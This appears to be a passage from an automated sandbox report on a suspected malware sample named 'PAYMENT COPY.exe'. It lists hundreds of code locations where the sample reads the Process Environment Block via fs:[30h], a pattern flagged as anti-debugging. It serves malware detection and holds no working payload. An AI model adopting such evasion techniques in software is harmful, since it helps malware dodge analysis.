                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01000710 mov eax, dword ptr fs:[00000030h]1_2_01000710
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C720 mov eax, dword ptr fs:[00000030h]1_2_0100C720
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C720 mov eax, dword ptr fs:[00000030h]1_2_0100C720
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104C730 mov eax, dword ptr fs:[00000030h]1_2_0104C730
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100273C mov eax, dword ptr fs:[00000030h]1_2_0100273C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100273C mov ecx, dword ptr fs:[00000030h]1_2_0100273C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100273C mov eax, dword ptr fs:[00000030h]1_2_0100273C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100674D mov esi, dword ptr fs:[00000030h]1_2_0100674D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100674D mov eax, dword ptr fs:[00000030h]1_2_0100674D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100674D mov eax, dword ptr fs:[00000030h]1_2_0100674D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012750 mov eax, dword ptr fs:[00000030h]1_2_01012750
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012750 mov eax, dword ptr fs:[00000030h]1_2_01012750
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105E75D mov eax, dword ptr fs:[00000030h]1_2_0105E75D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4690 mov eax, dword ptr fs:[00000030h]1_2_00FD4690
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4690 mov eax, dword ptr fs:[00000030h]1_2_00FD4690
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107678E mov eax, dword ptr fs:[00000030h]1_2_0107678E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010847A0 mov eax, dword ptr fs:[00000030h]1_2_010847A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEC640 mov eax, dword ptr fs:[00000030h]1_2_00FEC640
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010507C3 mov eax, dword ptr fs:[00000030h]1_2_010507C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD262C mov eax, dword ptr fs:[00000030h]1_2_00FD262C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE627 mov eax, dword ptr fs:[00000030h]1_2_00FEE627
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105E7E1 mov eax, dword ptr fs:[00000030h]1_2_0105E7E1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD47FB mov eax, dword ptr fs:[00000030h]1_2_00FD47FB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD47FB mov eax, dword ptr fs:[00000030h]1_2_00FD47FB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E609 mov eax, dword ptr fs:[00000030h]1_2_0104E609
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF27ED mov eax, dword ptr fs:[00000030h]1_2_00FF27ED
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF27ED mov eax, dword ptr fs:[00000030h]1_2_00FF27ED
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF27ED mov eax, dword ptr fs:[00000030h]1_2_00FF27ED
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012619 mov eax, dword ptr fs:[00000030h]1_2_01012619
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01006620 mov eax, dword ptr fs:[00000030h]1_2_01006620
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01008620 mov eax, dword ptr fs:[00000030h]1_2_01008620
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDC7C0 mov eax, dword ptr fs:[00000030h]1_2_00FDC7C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD07AF mov eax, dword ptr fs:[00000030h]1_2_00FD07AF
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A660 mov eax, dword ptr fs:[00000030h]1_2_0100A660
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A660 mov eax, dword ptr fs:[00000030h]1_2_0100A660
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109866E mov eax, dword ptr fs:[00000030h]1_2_0109866E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109866E mov eax, dword ptr fs:[00000030h]1_2_0109866E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01002674 mov eax, dword ptr fs:[00000030h]1_2_01002674
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8770 mov eax, dword ptr fs:[00000030h]1_2_00FD8770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C6A6 mov eax, dword ptr fs:[00000030h]1_2_0100C6A6
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0750 mov eax, dword ptr fs:[00000030h]1_2_00FD0750
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010066B0 mov eax, dword ptr fs:[00000030h]1_2_010066B0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0100A6C7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A6C7 mov eax, dword ptr fs:[00000030h]1_2_0100A6C7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0710 mov eax, dword ptr fs:[00000030h]1_2_00FD0710
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010506F1 mov eax, dword ptr fs:[00000030h]1_2_010506F1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010506F1 mov eax, dword ptr fs:[00000030h]1_2_010506F1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E6F2 mov eax, dword ptr fs:[00000030h]1_2_0104E6F2
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E6F2 mov eax, dword ptr fs:[00000030h]1_2_0104E6F2
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E6F2 mov eax, dword ptr fs:[00000030h]1_2_0104E6F2
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E6F2 mov eax, dword ptr fs:[00000030h]1_2_0104E6F2
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E908 mov eax, dword ptr fs:[00000030h]1_2_0104E908
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E908 mov eax, dword ptr fs:[00000030h]1_2_0104E908
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105C912 mov eax, dword ptr fs:[00000030h]1_2_0105C912
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0106892B mov eax, dword ptr fs:[00000030h]1_2_0106892B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105892A mov eax, dword ptr fs:[00000030h]1_2_0105892A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01050946 mov eax, dword ptr fs:[00000030h]1_2_01050946
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4940 mov eax, dword ptr fs:[00000030h]1_2_010A4940
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105C97C mov eax, dword ptr fs:[00000030h]1_2_0105C97C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0887 mov eax, dword ptr fs:[00000030h]1_2_00FD0887
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01074978 mov eax, dword ptr fs:[00000030h]1_2_01074978
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01074978 mov eax, dword ptr fs:[00000030h]1_2_01074978
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4859 mov eax, dword ptr fs:[00000030h]1_2_00FD4859
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4859 mov eax, dword ptr fs:[00000030h]1_2_00FD4859
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010589B3 mov esi, dword ptr fs:[00000030h]1_2_010589B3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010589B3 mov eax, dword ptr fs:[00000030h]1_2_010589B3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010589B3 mov eax, dword ptr fs:[00000030h]1_2_010589B3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010669C0 mov eax, dword ptr fs:[00000030h]1_2_010669C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2835 mov eax, dword ptr fs:[00000030h]1_2_00FF2835
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2835 mov eax, dword ptr fs:[00000030h]1_2_00FF2835
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2835 mov eax, dword ptr fs:[00000030h]1_2_00FF2835
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2835 mov ecx, dword ptr fs:[00000030h]1_2_00FF2835
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2835 mov eax, dword ptr fs:[00000030h]1_2_00FF2835
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2835 mov eax, dword ptr fs:[00000030h]1_2_00FF2835
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010049D0 mov eax, dword ptr fs:[00000030h]1_2_010049D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109A9D3 mov eax, dword ptr fs:[00000030h]1_2_0109A9D3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105E9E0 mov eax, dword ptr fs:[00000030h]1_2_0105E9E0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010029F9 mov eax, dword ptr fs:[00000030h]1_2_010029F9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010029F9 mov eax, dword ptr fs:[00000030h]1_2_010029F9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105C810 mov eax, dword ptr fs:[00000030h]1_2_0105C810
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_00FDA9D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_00FDA9D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_00FDA9D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_00FDA9D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_00FDA9D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_00FDA9D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A830 mov eax, dword ptr fs:[00000030h]1_2_0100A830
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107483A mov eax, dword ptr fs:[00000030h]1_2_0107483A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107483A mov eax, dword ptr fs:[00000030h]1_2_0107483A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD09AD mov eax, dword ptr fs:[00000030h]1_2_00FD09AD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD09AD mov eax, dword ptr fs:[00000030h]1_2_00FD09AD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01000854 mov eax, dword ptr fs:[00000030h]1_2_01000854
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01066870 mov eax, dword ptr fs:[00000030h]1_2_01066870
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01066870 mov eax, dword ptr fs:[00000030h]1_2_01066870
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105E872 mov eax, dword ptr fs:[00000030h]1_2_0105E872
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105E872 mov eax, dword ptr fs:[00000030h]1_2_0105E872
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105C89D mov eax, dword ptr fs:[00000030h]1_2_0105C89D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF6962 mov eax, dword ptr fs:[00000030h]1_2_00FF6962
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF6962 mov eax, dword ptr fs:[00000030h]1_2_00FF6962
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF6962 mov eax, dword ptr fs:[00000030h]1_2_00FF6962
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A08C0 mov eax, dword ptr fs:[00000030h]1_2_010A08C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC8918 mov eax, dword ptr fs:[00000030h]1_2_00FC8918
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC8918 mov eax, dword ptr fs:[00000030h]1_2_00FC8918
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109A8E4 mov eax, dword ptr fs:[00000030h]1_2_0109A8E4
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C8F9 mov eax, dword ptr fs:[00000030h]1_2_0100C8F9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C8F9 mov eax, dword ptr fs:[00000030h]1_2_0100C8F9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01098B28 mov eax, dword ptr fs:[00000030h]1_2_01098B28
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01098B28 mov eax, dword ptr fs:[00000030h]1_2_01098B28
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0AD0 mov eax, dword ptr fs:[00000030h]1_2_00FD0AD0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01084B4B mov eax, dword ptr fs:[00000030h]1_2_01084B4B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01084B4B mov eax, dword ptr fs:[00000030h]1_2_01084B4B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01078B42 mov eax, dword ptr fs:[00000030h]1_2_01078B42
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01066B40 mov eax, dword ptr fs:[00000030h]1_2_01066B40
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01066B40 mov eax, dword ptr fs:[00000030h]1_2_01066B40
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109AB40 mov eax, dword ptr fs:[00000030h]1_2_0109AB40
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107EB50 mov eax, dword ptr fs:[00000030h]1_2_0107EB50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8AA0 mov eax, dword ptr fs:[00000030h]1_2_00FD8AA0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8AA0 mov eax, dword ptr fs:[00000030h]1_2_00FD8AA0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A2B57 mov eax, dword ptr fs:[00000030h]1_2_010A2B57
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A2B57 mov eax, dword ptr fs:[00000030h]1_2_010A2B57
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A2B57 mov eax, dword ptr fs:[00000030h]1_2_010A2B57
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A2B57 mov eax, dword ptr fs:[00000030h]1_2_010A2B57
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0A5B mov eax, dword ptr fs:[00000030h]1_2_00FE0A5B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0A5B mov eax, dword ptr fs:[00000030h]1_2_00FE0A5B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01084BB0 mov eax, dword ptr fs:[00000030h]1_2_01084BB0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01084BB0 mov eax, dword ptr fs:[00000030h]1_2_01084BB0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF4A35 mov eax, dword ptr fs:[00000030h]1_2_00FF4A35
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF4A35 mov eax, dword ptr fs:[00000030h]1_2_00FF4A35
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFEA2E mov eax, dword ptr fs:[00000030h]1_2_00FFEA2E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107EBD0 mov eax, dword ptr fs:[00000030h]1_2_0107EBD0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105CBF0 mov eax, dword ptr fs:[00000030h]1_2_0105CBF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]1_2_00FD8BF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]1_2_00FD8BF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]1_2_00FD8BF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105CA11 mov eax, dword ptr fs:[00000030h]1_2_0105CA11
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100CA24 mov eax, dword ptr fs:[00000030h]1_2_0100CA24
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0BCD mov eax, dword ptr fs:[00000030h]1_2_00FD0BCD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0BCD mov eax, dword ptr fs:[00000030h]1_2_00FD0BCD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0BCD mov eax, dword ptr fs:[00000030h]1_2_00FD0BCD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0100CA38 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FE0BBE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FE0BBE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0107EA60 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0100CA6F mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0100CA6F mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0100CA6F mov eax, dword ptr fs:[00000030h]
